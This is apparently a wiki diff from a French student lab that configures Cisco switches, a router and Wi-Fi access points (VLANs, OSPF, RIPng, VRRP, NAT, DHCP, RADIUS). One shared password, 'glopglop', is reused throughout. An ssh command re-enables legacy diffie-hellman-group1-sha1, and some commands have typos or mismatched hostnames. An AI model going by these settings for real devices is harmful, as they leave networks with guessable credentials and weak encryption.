SE2A5-R3(config)#crypto key generate rsa
 +
SE2A5-R3(config)#line vty 0 15
 +
SE2A5-R3(config-line)#transport input ssh
 +
SE2A5-R3(config-line)#exit</pre>
 +
* Accès console :
 +
 
 +
<pre>SE2A5-R3(config)#line console 0
 +
SE2A5-R3(config-line)#password glopglop
 +
SE2A5-R3(config-line)#login authentification default
 +
SE2A5-R3(config-line)#exit</pre>
 +
* Sécurisation des accès :
 +
 
 +
<pre>SE2A5-R3(config)#service password-encryption
 +
SE2A5-R3(config)#enable secret glopglop
 +
SE2A5-R3(config)#banner motd #Restricted Access#</pre>
 +
* Activer le routage :
 +
 
 +
<pre>SE2A5-R3(config)#ip routing</pre>
 +
* Activer VRRP :
 +
 
 +
<pre>SE2A5-R3(config)#license boot level network-advantage
 +
SE2A5-R3(config)#fhrp version vrrp v3</pre>
 +
====       '''Pont vers le VLAN 110 :''' ====
 +
 
 +
Le routeur Cisco ISR 4331 ne permet pas la configuration des VLAN. Une alternative à ce problème est de passer par des ponts (BDI) pour remplacer les VLAN 110 et 532.
 +
 
 +
* Bridge VLAN 110 :
 +
 
 +
<pre>SE2A5-R3(config)#interface bdi 110
 +
SE2A5-R3(config-if)#ip address 10.60.100.3 255.255.255.0
 +
SE2A5-R3(config-if)#vrrp 10 ip 10.60.100.254
 +
SE2A5-R3(config-if)#vrrp 10 preempt
 +
SE2A5-R3(config-if)#vrrp 10 priority 90
 +
SE2A5-R3(config-if)#no shutdown
 +
SE2A5-R3(config-if)#exit</pre>
 +
* Interface vers Cisco Catalyst 6509-E :
 +
 
 +
<pre>SE2A5-R3(config)#interface g0/0/2
 +
SE2A5-R3(config-if)#description TP-NET1
 +
SE2A5-R3(config-if)#no shutdown
 +
SE2A5-R3(config-if)#service instance 110 ethernet
 +
SE2A5-R3(config-if-srv)#encapsulation dot1q 110
 +
SE2A5-R3(config-if-srv)#rewrite ingress tag pop 1 symmetric
 +
SE2A5-R3(config-if-srv)#bridge-domain 110
 +
SE2A5-R3(config-if-srv)#exit
 +
SE2A5-R3(config-if)#exit</pre>
 +
* Interface vers Cisco Catalyst 9200 :
 +
 
 +
<pre>SE2A5-R3(config)#interface g0/0/1
 +
SE2A5-R3(config-if)#description TP-NET1
 +
SE2A5-R3(config-if)#no shutdown
 +
SE2A5-R3(config-if)#service instance 110 ethernet
 +
SE2A5-R3(config-if-srv)#encapsulation dot1q 110
 +
SE2A5-R3(config-if-srv)#rewrite ingress tag pop 1 symmetric
 +
SE2A5-R3(config-if-srv)#bridge-domain 110
 +
SE2A5-R3(config-if-srv)#exit
 +
SE2A5-R3(config-if)#exit</pre>
 +
====       '''Pont vers le VLAN 532 :''' ====
 +
 
 +
Le VLAN 532 permet l’interconnexion avec l’accès Internet de secours.
 +
 
 +
* Bridge VLAN 532 :
 +
 
 +
<pre>SE2A5-R3(config)#interface bdi 532
 +
SE2A5-R3(config-if)#ip address 192.168.222.82 255.255.255.248
 +
SE2A5-R3(config-if)#no shutdown
 +
SE2A5-R3(config-if)#exit</pre>
 +
* Interface d’interconnexion :
 +
 
 +
<pre>SE2A5-R3(config)#interface g0/0/0
 +
SE2A5-R3(config-if)#description INTERCO-1B
 +
SE2A5-R3(config-if)#no shutdown
 +
SE2A5-R3(config-if)#service instance 532 ethernet
 +
SE2A5-R3(config-if-srv)#encapsulation untagged
 +
SE2A5-R3(config-if-srv)#bridge-domain 532
 +
SE2A5-R3(config-if-srv)#exit
 +
SE2A5-R3(config-if)#exit</pre>
 +
====       '''Translation NAT dynamique :''' ====
 +
 
 +
On configure une mascarade sur l’accès Internet de secours. Pour cela, on utilise l’avant-dernière adresse du réseau routé <code>213.215.6.96/29</code> (soit l’adresse IP <code>213.215.6.101</code>).
 +
 
 +
* Configuration NAT :
 +
 
 +
<pre>SE2A5-R3(config)#interface loopback 0
 +
SE2A5-R3(config-if)#ip address 213.215.6.101 255.255.255.255
 +
SE2A5-R3(config-if)#exit
 +
SE2A5-R3(config)#interface bdi 532
 +
SE2A5-R3(config-if)#ip nat outside
 +
SE2A5-R3(config-if)#exit
 +
SE2A5-R3(config)#interface bdi 110
 +
SE2A5-R3(config-if)#ip nat inside
 +
SE2A5-R3(config-if)#exit
 +
SE2A5-R3(config)#access-list 10 permit 193.48.57.160 0.0.0.15
 +
SE2A5-R3(config)#ip nat inside source list 10 interface loopback 0 overload
 +
SE2A5-R3(config)#ip nat inside source static network 10.60.100.160 193.48.57.160 255.255.255.240</pre>
 +
== Paramétrage IPv6 ==
 +
 
 +
Le protocole de routage utilisé pour IPv6 est RIPv6. Le routeur Cisco Catalyst 6509-E possède une métrique plus faible que le routeur Cisco Catalyst 9200 lui permettant de devenir prioritaire pour le routage IPv6.
 +
 
 +
===   → '''Cisco Catalyst 6509-E''' ===
 +
 
 +
* Routage IPv6 - Protocole RIPv6 :
 +
 
 +
<pre>SE2A5-R1(config)#ipv6 unicast-routing
 +
SE2A5-R1(config)#ipv6 router rip tpima2a5
 +
SE2A5-R1(config-router)#redistribute connected metric 1
 +
SE2A5-R1(config-router)#redistribute rip 1 metric 1
 +
SE2A5-R1(config-router)#redistribute static metric 1
 +
SE2A5-R1(config-router)#exit</pre>
 +
* VLAN 110 :
 +
 
 +
<pre>SE2A5-R1(config)#interface vlan 110
 +
SE2A5-R1(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
 +
SE2A5-R1(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
 +
SE2A5-R1(config-if)#ipv6 nd router-preference high
 +
SE2A5-R1(config-if)#ipv6 enable
 +
SE2A5-R1(config-if)#exit</pre>
 +
* VLAN 530 :
 +
 
 +
<pre>SE2A5-R1(config)#interface vlan 530
 +
SE2A5-R1(config-if)#ipv6 address fe80::2 link-local
 +
SE2A5-R1(config-if)#ipv6 rip tpima2a5 enable
 +
SE2A5-R1(config-if)#ipv6 enable</pre>
 +
===   → '''Cisco Catalyst 9200''' ===
 +
 
 +
* Routage IPv6 - Protocole RIPv6 :
 +
 
 +
<pre>SE2A5-R2(config)#ipv6 unicast-routing
 +
SE2A5-R2(config)#ipv6 router rip tpima2a5
 +
SE2A5-R2(config-router)#redistribute connected metric 2
 +
SE2A5-R2(config-router)#redistribute rip 1 metric 2
 +
SE2A5-R2(config-router)#redistribute static metric 2
 +
SE2A5-R2(config-router)#exit</pre>
 +
* VLAN 110 :
 +
 
 +
<pre>SE2A5-R2(config)#interface vlan 110
 +
SE2A5-R2(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
 +
SE2A5-R2(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
 +
SE2A5-R2(config-if)#ipv6 nd router-preference medium
 +
SE2A5-R2(config-if)#ipv6 enable
 +
SE2A5-R2(config-if)#exit</pre>
 +
* VLAN 530 :
 +
 
 +
<pre>SE2A5-R2(config)#interface vlan 530
 +
SE2A5-R2(config-if)#ipv6 address fe80::3 link-local
 +
SE2A5-R2(config-if)#ipv6 rip tpima2a5 enable
 +
SE2A5-R2(config-if)#ipv6 enable
 +
SE2A5-R2(config-if)#exit</pre>
 +
===   → '''Cisco ISR 4331''' ===
  
=Architecture réseau=
+
* Activer le routage IPv6 :
  
* Architecture logique:
+
<pre>SE2A5-R3(config)#ipv6 unicast-routing</pre>
[[Fichier:kde_arch_log.jpg]]
+
* Bridge VLAN 110 :
  
* Architecture physique:
+
<pre>SE2A5-R3(config)#interface bdi 110
[[Fichier:kde_arch_phy.jpg]]
+
SE2A5-R3(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
 +
SE2A5-R3(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
 +
SE2A5-R3(config-if)#ipv6 nd router-preference low
 +
SE2A5-R3(config-if)#ipv6 enable
 +
SE2A5-R3(config-if)#exit</pre>
 +
* Bridge VLAN 532 :
  
=Configuration des équipements réseau=
+
<pre>SE2A5-R3(config)#interface bdi 532
 +
SE2A5-R2(config-if)#ipv6 address fe80::2 link-local
 +
SE2A5-R3(config-if)#ipv6 enable
 +
SE2A5-R3(config-if)#exit</pre>
 +
== Configuration du VLAN 164 ==
  
==Configuration de base==
+
Le réseau privé (VLAN 164) est utilisé principalement pour les appareils connectés aux points d’accès Wifi. La plage IPv4 concernée par le VLAN 164 est <code>10.60.164.0/24</code>.
  
===Cisco Catalyst 6509-E===
+
===   → '''Cisco Catalyst 6509-E''' ===
  
switch>enable
+
* VLAN 164 :
switch#configure terminal
 
* Configuration du nom d’hôte
 
switch(config)#hostname SE2A5-R1
 
* Accès SSH
 
SE2A5-R1(config)#aaa new-model
 
SE2A5-R1(config)#username admin privilege 15 secret glopglop
 
SE2A5-R1(config)#ip domain-name plil.info
 
SE2A5-R1(config)#crypto key generate rsa
 
SE2A5-R1(config)#line vty 0 15
 
SE2A5-R1(config-line)#transport input ssh
 
SE2A5-R1(config-line)#exit
 
* Accès console
 
SE2A5-R1(config)#line console 0
 
SE2A5-R1(config-line)#password glopglop
 
SE2A5-R1(config-line)#login authentification AAA_CONSOLE
 
SE2A5-R1(config-line)#exit
 
* Sécurisation des accès
 
SE2A5-R1(config)#service password-encryption
 
SE2A5-R1(config)#enable secret glopglop
 
SE2A5-R1(config)#banner motd #Restricted Access#
 
* Activer le routage
 
SE2A5-R1(config)#ip routing
 
SE2A5-R1(config)#ipv6 unicast-routing
 
* Activer VRRP
 
SE2A5-R1(config)#license boot level network-advantage
 
SE2A5-R1(config)#fhrp version vrrp v3
 
  
===Cisco Catalyst 9200===
+
<pre>SE2A5-R1(config)#vlan 164
 +
SE2A5-R1(config-vlan)#name DEMINEUR
 +
SE2A5-R1(config-vlan)#exit
 +
SE2A5-R1(config)#interface vlan 164
 +
SE2A5-R1(config-if)#description DEMINEUR
 +
SE2A5-R1(config-if)#ip address 10.60.164.1 255.255.255.0
 +
SE2A5-R1(config-if)#ipv6 address 2001:660:4401:60a4::/64 eui-64
 +
SE2A5-R1(config-if)#ipv6 nd prefix 2001:660:4401:60a4::/64 1000 900
 +
SE2A5-R1(config-if)#ipv6 nd router-preference high
 +
SE2A5-R1(config-if)#ipv6 enable
 +
SE2A5-R1(config-if)#no shutdown
 +
SE2A5-R1(config-if)#vrrp 64 ip 10.60.164.254
 +
SE2A5-R1(config-if)#vrrp 64 preempt
 +
SE2A5-R1(config-if)#vrrp 64 priority 110
 +
SE2A5-R1(config-if)#vrrp 64 track 1 decrement 50
 +
SE2A5-R1(config-if)#exit</pre>
 +
* Interface vers Cisco Catalyst 9200 :
  
switch>enable
+
<pre>SE2A5-R1(config)#interface t5/4
switch#configure terminal
+
SE2A5-R1(config-if)#switchport trunk allowed vlan add 164
* Configuration du nom d’hôte
+
SE2A5-R1(config-if)#exit</pre>
switch(config)#hostname SE2A5-R2
+
* Interface vers le point d’accès Wifi :
* Accès SSH
 
SE2A5-R2(config)#aaa new-model
 
SE2A5-R2(config)#username admin privilege 15 secret glopglop
 
SE2A5-R2(config)#ip domain-name plil.info
 
SE2A5-R2(config)#crypto key generate rsa
 
SE2A5-R2(config)#line vty 0 15
 
SE2A5-R2(config-line)#transport input ssh
 
SE2A5-R2(config-line)#exit
 
* Accès console
 
SE2A5-R2(config)#line console 0
 
SE2A5-R2(config-line)#password glopglop
 
SE2A5-R2(config-line)#login authentification AAA_CONSOLE
 
SE2A5-R2(config-line)#exit
 
* Sécurisation des accès
 
SE2A5-R2(config)#service password-encryption
 
SE2A5-R2(config)#enable secret glopglop
 
SE2A5-R2(config)#banner motd #Restricted Access#
 
* Activer le routage
 
SE2A5-R2(config)#ip routing
 
SE2A5-R2(config)#ipv6 unicast-routing
 
* Activer VRRP
 
SE2A5-R2(config)#license boot level network-advantage
 
SE2A5-R2(config)#fhrp version vrrp v3
 
  
==Configuration du VLAN 530==
+
<pre>SE2A5-R1(config)#interface g3/1
 +
SE2A5-R1(config-if)#switchport trunk allowed vlan add 164
 +
SE2A5-R1(config-if)#exit</pre>
 +
* DHCP :
  
===Cisco Catalyst 6509-E===
+
<pre>SE2A5-R1(config)#ip dhcp pool DEMINEUR
 +
SE2A5-R1(dhcp-config)#dns 193.48.57.164
 +
SE2A5-R1(dhcp-config)#network 10.60.164.0 255.255.255.0
 +
SE2A5-R1(dhcp-config)#default-router 10.60.164.254
 +
SE2A5-R1(dhcp-config)#exit
 +
SE2A5-R1(config)#ip dhcp excluded-address 10.60.164.0 10.60.164.99
 +
SE2A5-R1(config)#ip dhcp excluded-address 10.60.164.150 10.60.164.255</pre>
 +
===   → '''Cisco Catalyst 9200''' ===
  
* VLAN 530
+
* VLAN 164 :
SE2A5-R1(config)#vlan 530
 
SE2A5-R1(config-vlan)#name INTERCO-4A
 
SE2A5-R1(config-vlan)#exit
 
SE2A5-R1(config)#interface vlan 530
 
SE2A5-R1(config-if)#description INTERCO-4A
 
SE2A5-R1(config-if)#ip address 192.168.222.34 255.255.255.248
 
SE2A5-R1(config-if)#no shutdown
 
SE2A5-R1(config-if)#exit
 
* Interface d’interconnexion
 
SE2A5-R1(config)#interface t6/5
 
SE2A5-R1(config-if)#switchport
 
SE2A5-R1(config-if)#switchport mode access
 
SE2A5-R1(config-if)#switchport access vlan 530
 
SE2A5-R1(config-if)#no shutdown
 
SE2A5-R1(config-if)#exit
 
  
===Cisco Catalyst 9200===
+
<pre>SE2A5-R2(config)#vlan 164
 +
SE2A5-R2(config-vlan)#name DEMINEUR
 +
SE2A5-R2(config-vlan)#exit
 +
SE2A5-R2(config)#interface vlan 164
 +
SE2A5-R2(config-if)#description DEMINEUR
 +
SE2A5-R2(config-if)#ip address 10.60.164.2 255.255.255.0
 +
SE2A5-R2(config-if)#ipv6 address 2001:660:4401:60a4::/64 eui-64
 +
SE2A5-R2(config-if)#ipv6 nd prefix 2001:660:4401:60a4::/64 1000 900
 +
SE2A5-R2(config-if)#ipv6 nd router-preference medium
 +
SE2A5-R2(config-if)#ipv6 enable
 +
SE2A5-R2(config-if)#no shutdown
 +
SE2A5-R2(config-if)#vrrp 64 address-family ipv4
 +
SE2A5-R2(config-if-vrrp)#address 10.60.164.254
 +
SE2A5-R2(config-if-vrrp)#priority 100
 +
SE2A5-R2(config-if-vrrp)#preempt
 +
SE2A5-R2(config-if-vrrp)#exit
 +
SE2A5-R2(config-if)#exit</pre>
 +
* Interface vers Cisco Catalyst 6509-E :
  
* VLAN 530
+
<pre>SE2A5-R2(config)#interface t1/1/2
SE2A5-R2(config)#vlan 530
+
SE2A5-R2(config-if)#switchport trunk allowed vlan add 164
SE2A5-R2(config-vlan)#name INTERCO-4A
+
SE2A5-R2(config-if)#exit</pre>
SE2A5-R2(config-vlan)#exit
+
* Interface vers le point d’accès Wifi :
SE2A5-R2(config)#interface vlan 530
 
SE2A5-R2(config-if)#description INTERCO-4A
 
SE2A5-R2(config-if)#ip address 192.168.222.35 255.255.255.248
 
SE2A5-R2(config-if)#no shutdown
 
SE2A5-R2(config-if)#exit
 
* Interface d’interconnexion
 
SE2A5-R2(config)#interface g1/0/1
 
SE2A5-R2(config-if)#switchport
 
SE2A5-R2(config-if)#switchport mode access
 
SE2A5-R2(config-if)#switchport access vlan 530
 
SE2A5-R2(config-if)#no shutdown
 
SE2A5-R2(config-if)#exit
 
  
==Configuration du VLAN 110==
+
<pre>SE2A5-R2(config)#interface g1/0/3
 +
SE2A5-R2(config-if)#switchport trunk allowed vlan add 164
 +
SE2A5-R2(config-if)#exit</pre>
 +
* DHCP :
  
===Cisco Catalyst 6509-E===
+
<pre>SE2A5-R2(config)#ip dhcp pool DEMINEUR
 +
SE2A5-R2(dhcp-config)#dns 193.48.57.164
 +
SE2A5-R2(dhcp-config)#network 10.60.164.0 255.255.255.0
 +
SE2A5-R2(dhcp-config)#default-router 10.60.164.254
 +
SE2A5-R2(dhcp-config)#exit
 +
SE2A5-R2(config)#ip dhcp excluded-address 10.60.164.0 10.60.164.149
 +
SE2A5-R2(config)#ip dhcp excluded-address 10.60.164.200 10.60.164.255</pre>
 +
== Configuration des points d’accès Wifi ==
  
* VLAN 110
+
===   → Cisco Catalyst 6509-E ===
SE2A5-R1(config)#vlan 110
 
SE2A5-R1(config-vlan)#name TP-NET1
 
SE2A5-R1(config-vlan)#exit
 
SE2A5-R1(config)#interface vlan 110
 
SE2A5-R1(config-if)#description TP-NET1
 
SE2A5-R1(config-if)#ip address 10.60.100.1 255.255.255.0
 
SE2A5-R1(config-if)#no shutdown
 
SE2A5-R1(config-if)#exit
 
* Interface vers serveur Capbreton
 
SE2A5-R1(config)#interface t6/4
 
SE2A5-R1(config-if)#switchport
 
SE2A5-R1(config-if)#switchport mode access
 
SE2A5-R1(config-if)#switchport access vlan 110
 
SE2A5-R1(config-if)#no shutdown
 
SE2A5-R1(config-if)#exit
 
  
===Cisco Catalyst 9200===
+
* VLAN n°1 :
  
* VLAN 110
+
<pre>SE2A5-R1(config)#interface vlan 1
SE2A5-R2(config)#vlan 110
+
SE2A5-R1(config-if)#ip address 10.60.101.252 255.255.255.0
SE2A5-R2(config-vlan)#name TP-NET1
+
SE2A5-R1(config-if)#no shutdown
SE2A5-R2(config-vlan)#exit
+
SE2A5-R1(config-if)#vrrp 1 ip 10.60.101.254
SE2A5-R2(config)#interface vlan 110
+
SE2A5-R1(config-if)#vrrp 1 preempt
SE2A5-R2(config-if)#description TP-NET1
+
SE2A5-R1(config-if)#vrrp 1 priority 110
SE2A5-R2(config-if)#ip address 10.60.100.2 255.255.255.0
+
SE2A5-R1(config-if)#exit</pre>
SE2A5-R2(config-if)#no shutdown
+
* Interface vers le point d’accès Wifi :
SE2A5-R2(config-if)#exit
 
* Interface vers serveur Capbreton
 
SE2A5-R2(config)#interface t1/1/1
 
SE2A5-R2(config-if)#switchport
 
SE2A5-R2(config-if)#switchport mode access
 
SE2A5-R2(config-if)#switchport access vlan 110
 
SE2A5-R2(config-if)#no shutdown
 
SE2A5-R2(config-if)#exit
 
  
==Paramétrage du routage IPv4 OSPF==
+
<pre>SE2A5-R1(config)#interface g3/1
 +
SE2A5-R1(config-if)#switchport
 +
SE2A5-R1(config-if)#switchport mode trunk
 +
SE2A5-R1(config-if)#switchport trunk allowed vlan add 1
 +
SE2A5-R1(config-if)#no shutdown
 +
SE2A5-R1(config-if)#exit</pre>
 +
* NAT PAT :
  
===Cisco Catalyst 6509-E===
+
<pre>SE2A5-R1(config)#access-list 164 permit ip 10.60.164.0 0.0.0.255 any
 +
SE2A5-R1(config)#interface vlan 164
 +
SE2A5-R1(config-if)#ip nat inside
 +
SE2A5-R1(config-if)#exit
 +
SE2A5-R1(config)#interface vlan 110
 +
SE2A5-R1(config-if)#ip nat outside
 +
SE2A5-R1(config-if)#exit
 +
SE2A5-R1(config)#ip nat inside source list 164 interface t6/4 overload</pre>
 +
===   → Cisco Catalyst 9200 ===
  
* Routage IPv4 - Protocole OPSF
+
* VLAN n°1 :
SE2A5-R1(config)#router ospf 1
 
SE2A5-R1(config-router)#router-id 192.168.222.34
 
SE2A5-R1(config-router)#summary-address 193.48.57.160 255.255.255.240
 
SE2A5-R1(config-router)#summary-address 10.0.0.0 255.0.0.0 not-advertise
 
SE2A5-R1(config-router)#redistribute connected subnets
 
SE2A5-R1(config-router)#redistribute static subnets
 
SE2A5-R1(config-router)#network 192.168.222.32 0.0.0.7 area 10
 
SE2A5-R1(config-router)#network 192.168.222.48 0.0.0.7 area 20
 
SE2A5-R1(config-router)#default-information originate
 
SE2A5-R1(config-router)#exit
 
  
===Cisco Catalyst 9200===
+
<pre>SE2A5-R2(config)#interface vlan 1
 +
SE2A5-R2(config-if)#ip address 10.60.101.253 255.255.255.0
 +
SE2A5-R2(config-if)#no shutdown
 +
SE2A5-R2(config-if)#vrrp 1 address-family ipv4
 +
SE2A5-R2(config-if-vrrp)#address 10.60.101.254
 +
SE2A5-R2(config-if-vrrp)#vrrpv2
 +
SE2A5-R2(config-if-vrrp)#priority 100
 +
SE2A5-R2(config-if-vrrp)#preempt
 +
SE2A5-R2(config-if-vrrp)#exit
 +
SE2A5-R2(config-if)#exit</pre>
 +
* Interface vers le point d’accès Wifi :
  
* Routage IPv4 - Protocole OPSF
+
<pre>SE2A5-R2(config)#interface g1/0/3
SE2A5-R2(config)#router ospf 1
+
SE2A5-R2(config-if)#switchport
SE2A5-R2(config-router)#router-id 192.168.222.34
+
SE2A5-R2(config-if)#switchport mode trunk
SE2A5-R2(config-router)#summary-address 193.48.57.160 255.255.255.240
+
SE2A5-R2(config-if)#switchport trunk allowed vlan 1
SE2A5-R2(config-router)#summary-address 10.0.0.0 255.0.0.0 not-advertise
+
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-router)#redistribute connected subnets
+
SE2A5-R2(config-if)#exit</pre>
SE2A5-R2(config-router)#redistribute static subnets
+
===   → Point d’accès Wifi n°1 ===
SE2A5-R2(config-router)#network 192.168.222.32 0.0.0.7 area 10
 
SE2A5-R2(config-router)#network 192.168.222.48 0.0.0.7 area 20
 
SE2A5-R2(config-router)#default-information originate
 
SE2A5-R2(config-router)#exit
 
  
==Redondance des routeurs via le protocole VRRP==
+
====       '''Configuration de base :''' ====
  
===Cisco Catalyst 6509-E===
+
<pre>ap&gt;enable
 +
ap#configure terminal</pre>
 +
* Configuration du nom d’hôte :
  
* VLAN 110
+
<pre>ap(config)#hostname SE2A5-AP1</pre>
SE2A5-R1(config)#interface vlan 110
+
* Accès SSH :
SE2A5-R1(config-if)#vrrp 10 ip 10.60.100.254
 
SE2A5-R1(config-if)#vrrp 10 preempt
 
SE2A5-R1(config-if)#vrrp 10 priority 110
 
SE2A5-R1(config-if)#exit
 
  
===Cisco Catalyst 9200===
+
<pre>SE2A5-AP1(config)#aaa new-model
 +
SE2A5-AP1(config)#username admin privilege 15 secret glopglop
 +
SE2A5-AP1(config)#ip domain-name plil.info
 +
SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048
 +
SE2A5-AP1(config)#ip ssh version 2
 +
SE2A5-AP1(config)#line vty 0 15
 +
SE2A5-AP1(config-line)#transport input ssh
 +
SE2A5-AP1(config-line)#exit</pre>
 +
* Accès console :
  
* VLAN 110
+
<pre>SE2A5-AP1(config)#line console 0
SE2A5-R2(config)#interface vlan 110
+
SE2A5-AP1(config-line)#password glopglop
SE2A5-R2(config-if)#vrrp 10 address-family ipv4
+
SE2A5-AP1(config-line)#login authentification default
SE2A5-R2(config-if-vrrp)#address 10.60.100.254
+
SE2A5-AP1(config-line)#exit</pre>
SE2A5-R2(config-if-vrrp)#priority 100
+
* Sécurisation des accès :
SE2A5-R2(config-if-vrrp)#preempt
 
SE2A5-R2(config-if-vrrp)#exit
 
SE2A5-R2(config-if)#exit
 
  
==Translation NAT statique==
+
<pre>SE2A5-AP1(config)#service password-encryption
 +
SE2A5-AP1(config)#enable secret glopglop
 +
SE2A5-AP1(config)#banner motd #Restricted Access#</pre>
 +
* VLAN n°1 :
  
===Cisco Catalyst 6509-E===
+
<pre>SE2A5-AP1(config)#interface BVI 1
 +
SE2A5-AP1(config-if)#ip address 10.60.101.1 255.255.255.0
 +
SE2A5-AP1(config-if)#no shutdown
 +
SE2A5-AP1(config-if)#exit
 +
SE2A5-AP1(config)#ip default-gateway 10.60.101.254</pre>
 +
====       '''Réseau privé (VLAN 164) :''' ====
  
* NAT
+
* Configuration Wifi EAP :
SE2A5-R1(config)#interface vlan 530
 
SE2A5-R1(config-if)#ip nat outside
 
SE2A5-R1(config-if)#exit
 
SE2A5-R1(config)#interface vlan 110
 
SE2A5-R1(config-if)#ip nat inside
 
SE2A5-R1(config-if)#exit
 
SE2A5-R1(config)#ip nat inside source static network 10.60.100.160 193.48.57.160 /28
 
* Redistribution via OSPF à partir de l'interface Loopback 0
 
SE2A5-R1(config)#interface loopback 0
 
SE2A5-R1(config-if)#ip address 193.48.57.174 255.255.255.240
 
SE2A5-R1(config-if)#no shutdown
 
SE2A5-R1(config-if)#exit
 
  
La solution avec NAT ne permet pas de router les paquets pour les connexions TCP.
+
<pre>SE2A5-AP1(config)#aaa authentication login EAP_DEMINEUR group RADIUS_DEMINEUR
Les VM doient en effet avoir une configuration IP sur le réseau 193.48.57.160/28.
+
SE2A5-AP1(config)#radius-server host 10.60.100.164 auth-port 1812 acct-port 1813 key glopglop
 +
SE2A5-AP1(config)#aaa group server radius RADIUS_DEMINEUR
 +
SE2A5-AP1(config-server)#server 10.60.100.164 auth-port 1812 acct-port 1813
 +
SE2A5-AP1(config-server)#exit
 +
SE2A5-AP1(config)#dot11 ssid DEMINEUR1
 +
SE2A5-AP1(config-ssid)#mbssid guest-mode
 +
SE2A5-AP1(config-ssid)#vlan 164
 +
SE2A5-AP1(config-ssid)#authentication open eap EAP_DEMINEUR
 +
SE2A5-AP1(config-ssid)#authentication network-eap EAP_DEMINEUR
 +
SE2A5-AP1(config-ssid)#authentication key-management wpa
 +
SE2A5-AP1(config-ssid)#exit
 +
SE2A5-AP1(config)#interface dot11radio0.164
 +
SE2A5-AP1(config-subif)#encapsulation dot1q 164
 +
SE2A5-AP1(config-subif)#bridge-group 64
 +
SE2A5-AP1(config-subif)#exit
 +
SE2A5-AP1(config)#interface g0.164
 +
SE2A5-AP1(config-subif)#encapsulation dot1q 164
 +
SE2A5-AP1(config-subif)#bridge-group 64
 +
SE2A5-AP1(config-subif)#exit
 +
SE2A5-AP1(config)#interface dot11radio 0
 +
SE2A5-AP2(config-if)#no shutdown
 +
SE2A5-AP1(config-if)#encryption vlan 164 mode ciphers aes-ccm tkip
 +
SE2A5-AP1(config-if)#mbssid
 +
SE2A5-AP1(config-if)#ssid DEMINEUR1
 +
SE2A5-AP1(config-if)#exit</pre>
 +
On considère la commande ci-dessous de la configuration précédente :
  
La solution avec les routes statiques demande que les VM aient une configuration IP sur le réseau 10.60.100.160/28.
+
<pre>radius-server host 10.60.100.164 auth-port 1812 acct-port 1813 key glopglop</pre>
 +
Cette commande permet au PA de se connecter au serveur <code>freeradius</code> sur la VM afin de vérifier qu’un utilisateur se connecte avec les bons identifiants.<br />
 +
Le mot de passe <code>glopglop</code> qui est spécifié sera également à définir dans les clients <code>freeradius</code> sur la VM.
  
En attente d'une solution de contournement.
+
L’accès SSH au PA nécessite de spécifier l’utilisation de l’algorithme de Diffie-Hellman et le chiffrement AES-128 :
Ou ajouter les routes statiques comme pour le Cisco Catalyst 9200.
 
  
===Cisco Catalyst 9200===
+
<pre>ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc admin@10.60.101.1</pre>
 +
===   → Point d’accès Wifi n°2 ===
  
* NAT
+
====       '''Configuration de base :''' ====
SE2A5-R2(config)#interface vlan 530
 
SE2A5-R2(config-if)#ip nat outside
 
SE2A5-R2(config-if)#exit
 
SE2A5-R2(config)#interface vlan 110
 
SE2A5-R2(config-if)#ip nat inside
 
SE2A5-R2(config-if)#exit
 
SE2A5-R2(config)#ip nat inside source static network 10.60.100.160 193.48.57.160 /28
 
  
Comme le Cisco Catalyst 9200 ne prend pas en charge NAT, nous passons par des routes statiques.
+
<pre>ap&gt;enable
 +
ap#configure terminal</pre>
 +
* Configuration du nom d’hôte :
  
SE2A5-R2(config)#ip route 193.48.57.161 255.255.255.255 10.60.100.161
+
<pre>ap(config)#hostname SE2A5-AP2</pre>
SE2A5-R2(config)#ip route 193.48.57.162 255.255.255.255 10.60.100.162
+
* Accès SSH :
SE2A5-R2(config)#ip route 193.48.57.163 255.255.255.255 10.60.100.163
 
SE2A5-R2(config)#ip route 193.48.57.164 255.255.255.255 10.60.100.164
 
SE2A5-R2(config)#ip route 193.48.57.165 255.255.255.255 10.60.100.165
 
SE2A5-R2(config)#ip route 193.48.57.166 255.255.255.255 10.60.100.166
 
SE2A5-R2(config)#ip route 193.48.57.167 255.255.255.255 10.60.100.167
 
SE2A5-R2(config)#ip route 193.48.57.168 255.255.255.255 10.60.100.168
 
SE2A5-R2(config)#ip route 193.48.57.169 255.255.255.255 10.60.100.169
 
SE2A5-R2(config)#ip route 193.48.57.170 255.255.255.255 10.60.100.170
 
SE2A5-R2(config)#ip route 193.48.57.171 255.255.255.255 10.60.100.171
 
SE2A5-R2(config)#ip route 193.48.57.172 255.255.255.255 10.60.100.172
 
SE2A5-R2(config)#ip route 193.48.57.173 255.255.255.255 10.60.100.173
 
  
==Configuration de l'accès Internet de secours==
+
<pre>SE2A5-AP2(config)#aaa new-model
 +
SE2A5-AP2(config)#username admin privilege 15 secret glopglop
 +
SE2A5-AP2(config)#ip domain-name plil.info
 +
SE2A5-AP2(config)#crypto key generate rsa general-keys modulus 2048
 +
SE2A5-AP2(config)#ip ssh version 2
 +
SE2A5-AP2(config)#line vty 0 15
 +
SE2A5-AP2(config-line)#transport input ssh
 +
SE2A5-AP2(config-line)#exit</pre>
 +
* Accès console :
  
===Cisco Catalyst 6509-E===
+
<pre>SE2A5-AP2(config)#line console 0
 +
SE2A5-AP2(config-line)#password glopglop
 +
SE2A5-AP2(config-line)#login authentification default
 +
SE2A5-AP2(config-line)#exit</pre>
 +
* Sécurisation des accès :
  
* Interface vers Cisco ISR 4331
+
<pre>SE2A5-AP2(config)#service password-encryption
SE2A5-R1(config)#interface t5/5
+
SE2A5-AP2(config)#enable secret glopglop
SE2A5-R1(config-if)#switchport
+
SE2A5-AP2(config)#banner motd #Restricted Access#</pre>
SE2A5-R1(config-if)#switchport trunk encapsulation dot1q
+
* VLAN n°1 :
SE2A5-R1(config-if)#switchport mode trunk
 
SE2A5-R1(config-if)#switchport trunk allowed vlan 110
 
SE2A5-R1(config-if)#no shutdown
 
SE2A5-R1(config-if)#exit
 
* SLA
 
SE2A5-R1(config)#ip sla 1
 
SE2A5-R1(config-ip-sla)#icmp-echo 192.168.44.1
 
SE2A5-R1(config-ip-sla-echo)#frequency 300
 
